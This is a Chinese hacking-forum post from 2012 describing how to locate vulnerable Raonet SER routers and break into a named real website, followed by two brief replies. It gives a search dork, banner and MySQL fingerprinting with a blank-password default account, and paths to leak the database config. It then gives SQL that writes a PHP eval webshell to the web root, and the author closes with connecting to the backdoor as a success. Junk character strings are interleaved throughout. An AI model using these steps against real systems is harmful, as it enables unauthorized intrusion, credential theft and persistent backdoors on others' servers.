找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2645|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:7 |" l& v3 Z- f' v0 w5 A* q  F- w3 o
) P* b2 h* Q2 [* v8 O; \4 n
1:google搜索'Raonet Subscriber Ethernet Router'
  g2 m" }- M/ f% B. `! U1 @& @# ]2 E! {/ ]0 C
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
6 G4 X( p9 b! e+ A' A! Z1 L5 b: m1 {( ?) t4 T$ J( J; X0 i8 @
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
+ z2 c4 F: J' c7 U" n8 S( ]4 }, F; o4 d# o- ~: ]4 ~
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......2 L/ s) ?2 e6 V" N- ^) ~
$ o# @2 E$ x8 T& z8 P

  B" h7 K/ M6 f5 `7 x/ f7 y% }8 ~$ d' {! j7 F) S
入侵步骤:
! {( p/ Z1 D+ Q  [3 Z5 F" ]  m1 C3 }4 {  H$ b6 e( l
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php- g7 ?# C/ p( q2 m5 r+ ~
. W# p' q# V- Q" g
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
- t9 T4 h+ O* G: M- p3:得到密码后连接,查看GUI管理密码:
1 N( d0 M  \5 puse ser_500
9 l4 b0 m9 s) R. Yselect id,passwd from user;/ O) F1 O% |+ E2 L( n
4:通过数据库写入webshell,执行命令:
9 e$ i" d# R2 X; v* I! ]use mysql;
# I$ O. X: r5 fcreate table ok(cmd TEXT);
+ F' `4 y7 W$ uinsert into ok values("<?php @eval($_POST[cmd])?>");
) X* L1 l7 [3 I# m" Sselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
( w7 ?1 `8 S) i- M8 I1 o9 idrop table ok;
8 K  }1 D' Y8 m+ }2 ?0 _7 Z' q' [5 g
9 v0 g6 |$ D9 S5:连接后门shell.php ; a% p2 \0 m1 T, T% j$ K8 D
% p7 d) k8 N7 n* Y. B) G
6. 搞定!
" ^3 c$ S4 w" {9 G% I, `5 Q" D+ i; }
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表